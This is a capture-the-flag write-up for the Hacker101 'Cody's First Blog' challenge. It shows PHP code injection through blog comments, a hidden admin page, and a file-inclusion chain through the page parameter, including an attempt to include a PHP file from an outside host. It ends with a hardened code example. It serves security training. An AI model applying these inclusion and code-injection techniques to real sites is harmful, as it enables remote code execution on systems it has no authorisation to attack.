Hacker1 CTF - Cody's First Blog

Who would dare write their own blog software? Oh wait...

What a train wreck

This challenge has 3 flags, and I've managed to get 2 of them so far:

Flag 0

The "blog post" indicates that the site is powered by PHP. So what happens if we just include some PHP in the comment input box?

    <?php echo '<p>Hello World</p>'; ?>

First flag!

Flag 1

Looking at the page source shows a commented out anchor:

    <h3>Comments</h3>
    <!--<a href="?page=admin.auth.inc">Admin login</a>-->

Loading that path brings up an admin login page. No flag yet, but what if we try just admin.inc? Second flag! And we can approve comments, that's handy!

Flag 2

What are we going to do for the final flag? SQL injection on the login page? XSS in a comment? Maybe we can upload a file and include it? If we can include a remote PHP file maybe we could host it ourselves and inject some code for the target to execute.

    Notice: Undefined variable: title in /app/index.php on line 30

    Warning: include(http://4d4ms.com/lee.php): failed to open stream: Connection refused in /app/index.php on line 21

    Warning: include(): Failed opening 'http://4d4ms.com/lee.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /app/index.php on line 21

OK, so I think this server cannot reach outside its own network to include files via PHP (not to mention that the one "post" says as much):

"This server can't talk to the outside world and nobody but me can upload files, so there's no risk in just using include()."

So is there anything we can include from within the network?

    http://{ctf}/?page=http://127.0.0.1/admin.inc

    Notice: Undefined variable: title in /app/index.php on line 30
    Pending Comments

    Warning: mysql_query(): Access denied for user ''@'localhost' (using password: NO) in /app/admin.inc.php on line 5

    Warning: mysql_query(): A link to the server could not be established in /app/admin.inc.php on line 5

    Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in /app/admin.inc.php on line 6

Not sure what it's worth yet, but we know that MySQL is involved and that we can include local files; we'll need to spend some more time figuring out what to include. Ideally it would be content under our control, so maybe we can post a comment and somehow include it.

Update 04/28/2019: OK, combining what we've learned about flags 0 and 1, we can write some PHP code as a comment, approve it as admin, and now we need to execute it:

    http://{ctf}/?page=http://127.0.0.1/index

This will execute the PHP we've written and approved in the comments! But what does this challenge want us to do with that?

BINGO! All flags captured!
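As an added illustration (this is not the challenge's source and not code from the writeup), here are the two coding mistakes the chain above relies on, shown next to a hardened version: a page loader that hands a request parameter straight to include(), and comment bodies echoed without escaping so that an approved comment is something include() can parse. The `PAGES` map, the file names under `pages/`, and the function names are assumptions.

```php
<?php
// Added example, not the CTF application's code. Paths and names are
// assumed for illustration.

// --- Vulnerable pattern (what the include() warnings above imply) ---
// include($_GET['page'] . '.php');
// Whatever string arrives reaches include(): a local file name such as
// admin.inc, or, when allow_url_include is on, a URL, including the
// site itself over loopback, whose response is parsed as PHP.

// --- Hardened loader: resolve the request against a fixed allowlist ---
const PAGES = [
    'home'  => __DIR__ . '/pages/home.php',   // assumed file
    'about' => __DIR__ . '/pages/about.php',  // assumed file
];

function resolvePage(?string $requested): string
{
    // Unknown or missing names fall back to home. The user's string is
    // used only as a lookup key and is never concatenated into a path,
    // so no directory traversal, URL or stream wrapper can be reached.
    return PAGES[$requested] ?? PAGES['home'];
}

// Comment bodies are data, never code: escape on output so that a stored
// "<?php ... ?>" is rendered as literal text in the HTML.
function renderComment(string $body): string
{
    return '<p>' . htmlspecialchars($body, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</p>';
}

// Usage with constructed inputs.
include resolvePage($_GET['page'] ?? null);
echo renderComment("<?php echo 'Hello World'; ?>");
```

Two notes on the design. With `allow_url_include=Off` in php.ini (the default), the loopback include would already fail, but the allowlist is what closes the local-file path as well. Escaping on output matters independently: once comment text can never appear unescaped in a page, approving a comment no longer produces a document that include() could interpret as code.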